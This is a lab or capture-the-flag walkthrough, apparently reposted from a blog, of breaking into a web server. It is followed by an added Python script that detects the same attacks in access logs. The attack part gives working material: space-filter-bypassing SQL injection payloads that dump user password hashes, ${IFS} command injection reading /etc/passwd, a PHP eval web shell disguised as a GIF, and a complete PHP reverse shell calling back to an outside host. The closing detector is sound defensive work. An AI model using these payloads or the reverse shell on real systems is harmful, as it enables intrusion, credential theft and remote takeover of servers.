
Table of contents

1. Information gathering
   1.1 Subnet discovery
   1.2 Port scan
   1.3 Directory scan
2. Analysis of the findings
3. SQL injection
   3.1 Confirming SQL injection
   3.2 Finding the displayed columns
   3.3 Finding the injection point
   3.4 Enumerating the database
   3.5 Enumerating tables
   3.6 Enumerating columns
   3.7 Dumping the users table
   3.8 Logging in as superadmin
4. Exploitation
   File upload
   Command execution
   AntSword connection
5. Reverse shell
   5.1 Uploading the PHP reverse-shell file
   5.2 Local listener
6. Privilege escalation

1. Information gathering

1.1 Subnet discovery

```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.163.28
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.152 d2:a6:97:bb:46:9d       (Unknown: locally administered)
192.168.163.193 00:0c:29:01:34:57       VMware, Inc.
192.168.163.209 7c:b5:66:a5:f0:a5       Intel Corporate

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded
```

1.2 Port scan

```
┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:01:34:57 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -p- 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6ba824d6092fc99a8eabbc6e7d4eb9ad (RSA)
|   256 abe84f5338062c6af392e3974a0e3ed1 (ECDSA)
|_  256 327690b87dfca4326310cd676149d6c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:01:34:57 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
```

1.3 Directory scan

```
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.163.193 -x 403,404,500

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.163.193/_24-02-26_00-44-22.txt

Target: http://192.168.163.193/

[00:44:22] Starting:
[00:44:41] 200 -    0B  - /config.php
[00:44:51] 200 -  527B  - /login.php
[00:44:52] 302 -    0B  - /logout.php  ->  login.php
[00:45:01] 200 -  594B  - /register.php
[00:45:09] 301 -  320B  - /uploads  ->  http://192.168.163.193/uploads/

Task Completed

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.163.193
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.163.193
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 320] [--> http://192.168.163.193/uploads/]
/server-status        (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
```

2. Analysis of the findings

Visiting http://192.168.163.193/login.php shows a login page; weak passwords do not get in.

The directory scan also turned up http://192.168.163.193/register.php, a registration page. Register an account and try logging in with it.

After logging in, the site is a search page, so I guessed there is SQL injection; submitting it without entering anything brings up a form.

3. SQL injection

I did the SQL injection by capturing the request with a proxy, which I personally find more convenient.

3.1 Confirming SQL injection

Appending a single quote after OSINT makes the page display nothing at all, which indicates SQL injection. While looking for the displayed columns I guessed that spaces are being filtered.

3.2 Finding the displayed columns

Spaces are filtered, so the inline comment /**/ is used in their place.

3.3 Finding the injection point

```
search=OSINT'/**/union/**/select/**/1,2,3#
```

3.4 Enumerating the database

```
search=OSINT'/**/union/**/select/**/1,2,database()#
```

3.5 Enumerating tables

```
search=OSINT'/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema='webapphacking'#
```

3.6 Enumerating columns

```
search=OSINT'/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name='users'#
```

3.7 Dumping the users table

```
search=OSINT'/**/union/**/select/**/group_concat(user,':',pasword),2,3/**/from/**/users#
```

Result:

```
user1:5d41402abc4b2a76b9719d911017c592,
user2:6269c4f71a55b24bad0f0267d9be5508,
user3:0f359740bd1cda994f8b55330c86d845,
test:05a671c66aefea124cc08b76ea6d30bb,
superadmin:2386acb2cf356944177746fc92523983,
test1:05a671c66aefea124cc08b76ea6d30bb,
admin:e64b78fc3bc91bcbc7dc232ba8ec59e0,
asd:e64b78fc3bc91bcbc7dc232ba8ec59e0
```

Looking the hashes up on https://www.somd5.com/ gives superadmin / Uncrackable.

3.8 Logging in as superadmin

4. Exploitation

File upload

The upload is protected by an extension whitelist.

Command execution

An execution point was found in the "last name" field. Spaces are filtered here as well:

```
system('cat${IFS}/etc/passwd')
system('cat$IFS$1/etc/passwd')
```

Look at the uploads directory. Because uploads only accepts image-format files, we upload a malicious image and then change its extension through the command execution.

```
system('ls${IFS}-al${IFS}/var/www/html/uploads')
```

year2020 is the upload directory.

```
system('ls${IFS}-al${IFS}/var/www/html/uploads/year2020')
```

Upload the malicious image:

```
GIF89a
<?php eval($_POST['c']);?>
```

Change the extension:

```
system('mv${IFS}/var/www/html/uploads/year2020/1.jpg${IFS}/var/www/html/uploads/year2020/1.php')
```

After it executes successfully, visit http://192.168.163.193/uploads/year2020/1.php.

AntSword connection

5. Reverse shell

5.1 Uploading the PHP reverse-shell file

```php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.163.209';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");
umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
?>
```

5.2 Local listener

6. Privilege escalation

Uh, this privilege escalation... There is an executable in the legacy directory; simply running it gives root privileges.
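The two filter bypasses used in the SQL injection and command execution sections above (MySQL inline comments `/**/` standing in for spaces, and the shell variable `${IFS}` or `$IFS$1` doing the same in an injected command) are easy to miss in a web log if a detection rule only looks for `union select` with real spaces. The script below, added here as an example and not part of the original walkthrough or the target application, normalises each requested URL from an Apache-style access log by URL-decoding it and collapsing those space substitutes back to a single space, then matches a few rules against the normalised string. It also flags a `.php` file being requested under `/uploads/`, which is what the extension-rename step above produces. The log lines are constructed for this example, and the endpoint names `search.php` and `profile.php` and the `lastname` parameter are assumptions, since the post does not name them.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post).
# Endpoint and parameter names are assumed; the query strings reproduce the
# two space-filter bypasses discussed in the walkthrough.
SAMPLE_LOG = r"""
192.168.163.28 - - [26/Feb/2024:00:50:01 -0500] "GET /search.php?search=OSINT HTTP/1.1" 200 1532
192.168.163.28 - - [26/Feb/2024:00:50:09 -0500] "GET /search.php?search=OSINT%27/**/union/**/select/**/1,2,3%23 HTTP/1.1" 200 1601
192.168.163.28 - - [26/Feb/2024:00:51:30 -0500] "GET /search.php?search=OSINT%27/**/union/**/select/**/group_concat(user,%27:%27,pasword),2,3/**/from/**/users%23 HTTP/1.1" 200 2210
192.168.163.28 - - [26/Feb/2024:00:55:12 -0500] "GET /profile.php?lastname=system(%27cat$%7BIFS%7D/etc/passwd%27) HTTP/1.1" 200 3100
192.168.163.28 - - [26/Feb/2024:00:56:40 -0500] "GET /profile.php?lastname=system(%27ls$IFS$1-al$IFS$1/var/www/html/uploads%27) HTTP/1.1" 200 2048
192.168.163.28 - - [26/Feb/2024:00:57:03 -0500] "GET /uploads/year2020/1.php HTTP/1.1" 200 12
"""

# Pull the request line ("GET /path?query HTTP/1.1") out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Tokens an attacker can use where a filtered space would go: a MySQL inline
# comment, the shell's ${IFS}, or $IFS followed by an empty positional ($1).
SPACE_SUBSTITUTES = re.compile(r"/\*.*?\*/|\$\{IFS\}|\$IFS(?:\$\d)?", re.IGNORECASE)

# Rules are evaluated against the normalised request target, in this order.
RULES = {
    "sqli_union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
    "sqli_schema_enum": re.compile(r"information_schema\.|\bgroup_concat\s*\(", re.IGNORECASE),
    "cmd_exec_function": re.compile(r"\b(?:system|exec|passthru|shell_exec)\s*\(", re.IGNORECASE),
    "php_under_uploads": re.compile(r"^/uploads/.*\.ph(?:p\d?|tml)(?:[?/]|$)", re.IGNORECASE),
}


def normalize(target: str) -> str:
    """URL-decode twice (catches double encoding), then collapse space substitutes."""
    decoded = unquote_plus(unquote_plus(target))
    collapsed = SPACE_SUBSTITUTES.sub(" ", decoded)
    return re.sub(r"\s+", " ", collapsed).strip()


def analyze_line(line: str):
    """Return None for unparsable lines, else the target, its normalised form and rule hits."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = m.group("target")
    norm = normalize(target)
    hits = [name for name, rx in RULES.items() if rx.search(norm)]
    return {"target": target, "normalized": norm, "findings": hits}


def scan_log(text: str):
    """Return one alert dict per log line that triggered at least one rule."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        result = analyze_line(line)
        if result and result["findings"]:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(", ".join(alert["findings"]), "->", alert["normalized"])
```

Normalising before matching is the point: on the sample lines the `/**/` and `$IFS$1` payloads only match the `union select` and `system(` rules after the substitutes have been collapsed, and decoding twice means a `%2527` style double-encoded quote is seen as well. The `/uploads/*.php` rule is a cheap complement on the web server side: if the upload directory is also configured so the server never executes scripts from it, the rename trick above leaves only a log entry rather than a shell.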
http://www.zqtcl.cn/news/33925/
